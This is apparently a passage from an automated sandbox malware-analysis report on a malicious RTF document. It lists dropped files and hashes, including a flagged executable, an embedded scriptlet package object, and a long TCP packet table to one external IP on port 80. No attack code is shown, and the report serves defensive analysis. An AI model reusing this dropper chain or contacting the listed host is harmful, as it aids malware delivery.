                                                          SHA-256:80DDFCC0C707A6DF30F4F380C75C16A941158AA0BAA660CAEB068C3234F718FD
                                                          SHA-512:6286D09A5E01E54B7FA57724E4CCC73B36C3E179986A61055CC0A4B77CEEC144BC44545EEC8B7AF68F089721780242F0C7CEB0A865A3FE9E397DE034D96B6C45
                                                          Malicious:false
                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms2E (copy)
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8016
                                                          Entropy (8bit):3.582206362297639
                                                          Encrypted:false
                                                          SSDEEP:96:chQCQMqlqvsqvJCwoiiz8hQCQMqlqvsEHyqvJCworwizKAYuHXiKXX2lUV8iA2:cWUoiiz8WAHnorwizKoiKXXKiA2
                                                          MD5:484FCA57FA5B39E59B75DE31E510D704
                                                          SHA1:A9A4B2579158D1C71122D7C1418C78B497B41570
                                                          SHA-256:80DDFCC0C707A6DF30F4F380C75C16A941158AA0BAA660CAEB068C3234F718FD
                                                          SHA-512:6286D09A5E01E54B7FA57724E4CCC73B36C3E179986A61055CC0A4B77CEEC144BC44545EEC8B7AF68F089721780242F0C7CEB0A865A3FE9E397DE034D96B6C45
                                                          Malicious:false
                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msio (copy)
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8016
                                                          Entropy (8bit):3.582206362297639
                                                          Encrypted:false
                                                          SSDEEP:96:chQCQMqlqvsqvJCwoiiz8hQCQMqlqvsEHyqvJCworwizKAYuHXiKXX2lUV8iA2:cWUoiiz8WAHnorwizKoiKXXKiA2
                                                          MD5:484FCA57FA5B39E59B75DE31E510D704
                                                          SHA1:A9A4B2579158D1C71122D7C1418C78B497B41570
                                                          SHA-256:80DDFCC0C707A6DF30F4F380C75C16A941158AA0BAA660CAEB068C3234F718FD
                                                          SHA-512:6286D09A5E01E54B7FA57724E4CCC73B36C3E179986A61055CC0A4B77CEEC144BC44545EEC8B7AF68F089721780242F0C7CEB0A865A3FE9E397DE034D96B6C45
                                                          Malicious:false
                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FQ6733LFPKS74NKOVPFM.temp
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8016
                                                          Entropy (8bit):3.582206362297639
                                                          Encrypted:false
                                                          SSDEEP:96:chQCQMqlqvsqvJCwoiiz8hQCQMqlqvsEHyqvJCworwizKAYuHXiKXX2lUV8iA2:cWUoiiz8WAHnorwizKoiKXXKiA2
                                                          MD5:484FCA57FA5B39E59B75DE31E510D704
                                                          SHA1:A9A4B2579158D1C71122D7C1418C78B497B41570
                                                          SHA-256:80DDFCC0C707A6DF30F4F380C75C16A941158AA0BAA660CAEB068C3234F718FD
                                                          SHA-512:6286D09A5E01E54B7FA57724E4CCC73B36C3E179986A61055CC0A4B77CEEC144BC44545EEC8B7AF68F089721780242F0C7CEB0A865A3FE9E397DE034D96B6C45
                                                          Malicious:false
                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\O2GRPLQKV4A3U7C26MID.temp
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8016
                                                          Entropy (8bit):3.582206362297639
                                                          Encrypted:false
                                                          SSDEEP:96:chQCQMqlqvsqvJCwoiiz8hQCQMqlqvsEHyqvJCworwizKAYuHXiKXX2lUV8iA2:cWUoiiz8WAHnorwizKoiKXXKiA2
                                                          MD5:484FCA57FA5B39E59B75DE31E510D704
                                                          SHA1:A9A4B2579158D1C71122D7C1418C78B497B41570
                                                          SHA-256:80DDFCC0C707A6DF30F4F380C75C16A941158AA0BAA660CAEB068C3234F718FD
                                                          SHA-512:6286D09A5E01E54B7FA57724E4CCC73B36C3E179986A61055CC0A4B77CEEC144BC44545EEC8B7AF68F089721780242F0C7CEB0A865A3FE9E397DE034D96B6C45
                                                          Malicious:false
                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TM4WFGYHJ2HGTOWTIN9Q.temp
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8016
                                                          Entropy (8bit):3.582206362297639
                                                          Encrypted:false
                                                          SSDEEP:96:chQCQMqlqvsqvJCwoiiz8hQCQMqlqvsEHyqvJCworwizKAYuHXiKXX2lUV8iA2:cWUoiiz8WAHnorwizKoiKXXKiA2
                                                          MD5:484FCA57FA5B39E59B75DE31E510D704
                                                          SHA1:A9A4B2579158D1C71122D7C1418C78B497B41570
                                                          SHA-256:80DDFCC0C707A6DF30F4F380C75C16A941158AA0BAA660CAEB068C3234F718FD
                                                          SHA-512:6286D09A5E01E54B7FA57724E4CCC73B36C3E179986A61055CC0A4B77CEEC144BC44545EEC8B7AF68F089721780242F0C7CEB0A865A3FE9E397DE034D96B6C45
                                                          Malicious:false
                                                          C:\Users\user\AppData\Roaming\okcff.exe
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):194560
                                                          Entropy (8bit):4.668942832070624
                                                          Encrypted:false
                                                          SSDEEP:1536:QLwio+gEPHeB9PYR0uQ7nXhMM70iOVcse5m6h:rt+gIHeB9PYRnQL6S5
                                                          MD5:E9416A322E9A796D45588BC4FB04CD45
                                                          SHA1:8D261D205C8D34A4A24B713DD6B9585647B8BDEB
                                                          SHA-256:F2DA177AFF59093ABE1D3BC7C1A769BE2701784036C398900A43725D83C9E9A9
                                                          SHA-512:9A1FF2B39DFD93D3B6EAED4685876E8BF877BD1695FDC7095B74ABEADAFBAEE785815FEB75585D31299B3D0A18B5E88890DA942D65F407171C28CAF66655C5AE
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          C:\Users\user\Desktop\~$478644.doc
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):162
                                                          Entropy (8bit):2.5038355507075254
                                                          Encrypted:false
                                                          SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                          MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                          SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                          SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                          SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                          Malicious:true

                                                          Static File Info

                                                          General

                                                          File type:Rich Text Format data, unknown version
                                                          Entropy (8bit):3.602985307524326
                                                          TrID:
                                                          • Rich Text Format (5005/1) 55.56%
                                                          • Rich Text Format (4004/1) 44.44%
                                                          File name:478644.doc
                                                          File size:392070
                                                          MD5:c0f8f2fc481e9be7141d84b401edf1f7
                                                          SHA1:ab1dbe841b083ea886c9023307c0527f7bfbfff3
                                                          SHA256:4b0d21f58347c62f76445c6aa17a21dd00970f235734a1d1db4a40ee5a8b7c45
                                                          SHA512:215ace87d1af8847a40c2b8763230e1004c0c2b2f1cc842ddcb0fe73d7f2238c0fa024be82380c5135d55b5585d6d86e6619f59f36e5f43696d9bb1591784d77
                                                          SSDEEP:1536:inHYJDDDDDDDDtdLZvR0y0FC7Qqofroy41hzO9lca57hKfhdzFz76mAg5eeVhMDU:iYDDDDDDDDjoUdzFtr5RDAw5wfo
                                                          File Content Preview:{\rtf\Fbidi \froman\fcharset238\ud1\adeff31507\deff0\stshfdbch31506\stshfloch31506\ztahffick41c05\stshfBi31507\deEflAng1045\deEglangfe1045\themelang1045\themelangfe1\themelangcs5{\lsdlockedexcept \lsdqformat2 \lsdpriority0 \lsdlocked0 Normal;\b865c6673647

                                                          File Icon

                                                          Icon Hash:e4eea2aaa4b4b4a4

                                                          Static RTF Info

                                                          Objects

                                                          Id | Start | Format ID | Format | Classname | Datasize | Filename | Sourcepath | Temppath | Exploit
                                                          0 | 000007CDh | 2 | embedded | package | 97076 | abdtfhgXgeghDp.ScT | C:\nsdsTggH\abdtfhgXGeghDp.ScT | C:\CbkepaD\abdtfhghgeghDp.ScT | no
                                                          1 | 00031D7Ah | 2 | embedded | OLE2LInk | 2560 | | | | no

                                                          Network Behavior

                                                          Network Port Distribution

                                                          TCP Packets

                                                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                          Jan 14, 2022 10:23:18.079355001 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.079375982 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.079396009 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.079444885 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.079463005 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.079480886 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.079490900 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.079498053 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.079509974 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.079521894 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.079539061 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.079629898 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.079648972 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.079665899 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.079669952 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.079684019 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.079700947 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.080002069 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.080121994 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.080208063 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.105067968 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.105097055 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.105109930 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.105129004 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.105166912 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.105179071 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.105194092 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.105212927 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.105228901 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.105238914 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.105242968 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.105245113 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.105247974 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.105262995 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.105281115 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.105292082 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.105297089 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.105303049 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.105315924 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.105320930 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.105334044 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.105336905 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.105351925 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.105364084 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.105369091 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.105385065 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.106420040 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.106692076 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.106714010 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.106725931 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.106739998 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.106759071 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.106775045 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.106792927 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.106811047 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.106831074 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.106848001 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.106865883 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.106884956 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.106903076 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.106904030 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.106920004 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.106937885 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.106956005 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.106972933 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.106988907 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.106990099 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.107007980 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.107026100 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.107064962 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.107069969 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.107076883 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.107094049 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.107103109 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.107109070 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.107115984 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.107125044 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.107139111 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.107142925 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.107153893 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.107162952 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.107172966 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.107182980 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.107194901 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.107202053 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.107207060 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.107220888 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.107232094 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.107238054 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.107247114 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.107256889 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.107274055 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.107290030 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.107299089 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.107306004 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.107307911 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.107311010 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.107331991 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.107342958 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.110883951 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.132081032 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.132114887 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.132132053 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.132148981 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.132173061 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.132191896 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.132216930 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.132241964 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.132275105 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.132328987 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.132339954 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.132350922 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.132359028 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.132366896 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.133119106 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.133143902 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.133161068 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.133192062 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.133218050 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.133230925 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.133232117 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.133258104 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.133259058 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.133269072 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.133327961 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.133945942 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.133971930 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.133996010 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.134017944 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.134041071 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.134064913 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.134088993 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.134104967 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.134114027 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.134121895 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.134126902 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.134139061 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.134171009 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.134187937 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.134212971 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.134238958 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.134263039 CET804916737.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:18.134289980 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.134357929 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.134363890 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.134366989 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.134371042 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.134375095 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.134377956 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:18.146228075 CET4916780192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.488502026 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.516453981 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.516546965 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.518182993 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.544800997 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.545969963 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.545994043 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.546013117 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.546030998 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.546062946 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.546134949 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.546153069 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.546170950 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.546184063 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.546189070 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.546211004 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.546273947 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.546291113 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.546314955 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.574367046 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.574400902 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.574424982 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.574435949 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.574444056 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.574464083 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.574465036 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.574486971 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.574503899 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.574505091 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.574521065 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.574538946 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.574548960 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.574585915 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.574610949 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.574630022 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.574646950 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.574668884 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.574723959 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.574744940 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.574763060 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.574770927 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.574779987 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.574804068 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.574925900 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.574943066 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.574986935 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.601250887 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.601294994 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.601313114 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.601330996 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.601349115 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.601367950 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.601373911 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.601389885 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.601393938 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.601412058 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.601429939 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.601536036 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.601588964 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.601588964 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.601605892 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.601656914 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.601691008 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.601735115 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.601757050 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.601778030 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.601788998 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.601794004 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.601826906 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.601829052 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.601883888 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.601897001 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.601933002 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.601957083 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.601974010 CET4916880192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:22.602005959 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:22.602025032 CET804916837.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.589459896 CET4916980192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:23.589469910 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.589495897 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.589509964 CET4916980192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:23.589519024 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.589543104 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.589560986 CET4916980192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:23.589565992 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.589587927 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.589606047 CET4916980192.168.2.2237.0.9.166
                                                          Jan 14, 2022 10:23:23.589612007 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.589636087 CET804916937.0.9.166192.168.2.22
                                                          Jan 14, 2022 10:23:23.589649916 CET4916980192.168.2.2237.0.9.166
